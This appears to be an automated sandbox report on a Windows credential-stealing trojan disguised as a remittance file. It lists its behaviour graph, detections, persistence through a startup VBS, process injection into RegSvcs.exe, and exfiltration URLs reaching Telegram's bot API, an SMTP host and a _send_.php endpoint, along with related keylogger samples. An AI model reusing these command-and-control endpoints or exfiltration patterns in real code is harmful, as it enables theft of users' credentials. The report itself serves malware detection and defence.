                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518314 Sample: z84TTREMITTANCEUSD347_432_63.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 52 10 other signatures 2->52 8 z84TTREMITTANCEUSD347_432_63.exe 3 2->8         started        11 wscript.exe 1 2->11         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\name.exe, PE32 8->26 dropped 14 name.exe 1 8->14         started        58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->58 18 name.exe 11->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\Roaming\...\name.vbs, data 14->28 dropped 60 Antivirus detection for dropped file 14->60 62 Machine Learning detection for dropped file 14->62 64 Drops VBS files to the startup folder 14->64 66 Switches to a custom stack to bypass stack traces 14->66 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49722, 49745 TELEGRAMRU United Kingdom 20->36 38 us2.smtp.mailhostbox.com 208.91.198.143, 49727, 49746, 587 PUBLIC-DOMAIN-REGISTRYUS United States 20->38 40 2 other IPs or domains 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  z84TTREMITTANCEUSD347_432_63.exe100%AviraHEUR/AGEN.1321293
                  z84TTREMITTANCEUSD347_432_63.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\directory\name.exe100%AviraHEUR/AGEN.1321293
                  C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  http://varders.kozow.com:80810%URL Reputationsafe
                  http://aborters.duckdns.org:8081100%URL Reputationmalware
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                  http://anotherarmy.dns.army:8081100%URL Reputationmalware
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                  https://www.office.com/0%Avira URL Cloudsafe
                  https://api.telegram.org0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://api.telegram.org/bot0%Avira URL Cloudsafe
                  http://us2.smtp.mailhostbox.com0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a0%Avira URL Cloudsafe
                  https://www.office.com/lBjq0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                  https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
                  https://chrome.google.com/webstore?hl=enlBjq0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  us2.smtp.mailhostbox.com
                  208.91.198.143
                  truetrue
                    unknown
                    reallyfreegeoip.org
                    188.114.97.3
                    truetrue
                      unknown
                      api.telegram.org
                      149.154.167.220
                      truetrue
                        unknown
                        checkip.dyndns.com
                        193.122.130.0
                        truefalse
                          unknown
                          checkip.dyndns.org
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://reallyfreegeoip.org/xml/8.46.123.33false
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/RegSvcs.exe, 00000007.00000002.4562785704.0000000002F64000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.orgRegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/botname.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://us2.smtp.mailhostbox.comRegSvcs.exe, 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.office.com/lBjqRegSvcs.exe, 00000003.00000002.4562656465.00000000027AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000007.00000002.4562785704.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F73000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://varders.kozow.com:8081name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://aborters.duckdns.org:8081name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://reallyfreegeoip.org/xml/8.46.123.33$RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.000000000263B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://anotherarmy.dns.army:8081name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.org/qname.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002611000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedname.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://chrome.google.com/webstore?hl=enlBjqRegSvcs.exe, 00000003.00000002.4562656465.000000000277E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://reallyfreegeoip.org/xml/name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002611000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            208.91.198.143
                            us2.smtp.mailhostbox.comUnited States
                            394695PUBLIC-DOMAIN-REGISTRYUStrue
                            149.154.167.220
                            api.telegram.orgUnited Kingdom
                            62041TELEGRAMRUtrue
                            188.114.97.3
                            reallyfreegeoip.orgEuropean Union
                            13335CLOUDFLARENETUStrue
                            193.122.130.0
                            checkip.dyndns.comUnited States
                            31898ORACLE-BMC-31898USfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1518314
                            Start date and time:2024-09-25 15:33:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 50s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:z84TTREMITTANCEUSD347_432_63.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 56
                            • Number of non-executed functions: 309
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: z84TTREMITTANCEUSD347_432_63.exe
                            TimeTypeDescription
                            09:34:13API Interceptor13598267x Sleep call for process: RegSvcs.exe modified
                            15:34:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.91.198.143New Order PO#86637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                z68ORDER.scr.exeGet hashmaliciousAgentTeslaBrowse
                                  z17invoice.exeGet hashmaliciousAgentTeslaBrowse
                                    z47maaaaaaaaaaaaax.exeGet hashmaliciousAgentTeslaBrowse
                                      SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            giehjhgjzJ.htaGet hashmaliciousCobalt Strike, MassLogger RAT, Snake KeyloggerBrowse
                                              NGL1Of0ZkJ.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                                149.154.167.220rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                  Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    test.batGet hashmaliciousMicroClipBrowse
                                                      rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            Or3dzp4vB1.exeGet hashmaliciousXWormBrowse
                                                              z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                                                                    188.114.97.3PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.rtprajalojago.live/2wnz/
                                                                    (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                                                    • dddotx.shop/Mine/PWS/fre.php
                                                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • filetransfer.io/data-package/DiF66Hbf/download
                                                                    http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • easyantrim.pages.dev/id.html
                                                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • filetransfer.io/data-package/13rSMZZi/download
                                                                    Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                    • www.rtpngk.xyz/yhsl/
                                                                    PO-001.exeGet hashmaliciousFormBookBrowse
                                                                    • www.x0x9x8x8x7x6.shop/assb/
                                                                    PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                    • www.cc101.pro/4hfb/
                                                                    ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                                                                    • www.chinaen.org/zi4g/
                                                                    updater.exeGet hashmaliciousUnknownBrowse
                                                                    • microsoft-rage.world/Api/v3
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    reallyfreegeoip.orgrLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    rShippingDocuments_Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    rcontractorder.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    us2.smtp.mailhostbox.comz9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.223
                                                                    PAYSLIP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.224
                                                                    SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.224
                                                                    SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.223
                                                                    UPDATED FLOOR PLAN_3D.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.223
                                                                    New Order PO#86637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.223
                                                                    2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.225
                                                                    z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.198.143
                                                                    Invoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 208.91.199.224
                                                                    z47TTSWIFTCOPY.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.91.199.223
                                                                    checkip.dyndns.comrLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    rShippingDocuments_Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    rcontractorder.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    api.telegram.orgrLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    test.batGet hashmaliciousMicroClipBrowse
                                                                    • 149.154.167.220
                                                                    rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    Or3dzp4vB1.exeGet hashmaliciousXWormBrowse
                                                                    • 149.154.167.220
                                                                    z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                                                                    • 149.154.167.220
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    TELEGRAMRUrLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    test.batGet hashmaliciousMicroClipBrowse
                                                                    • 149.154.167.220
                                                                    rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
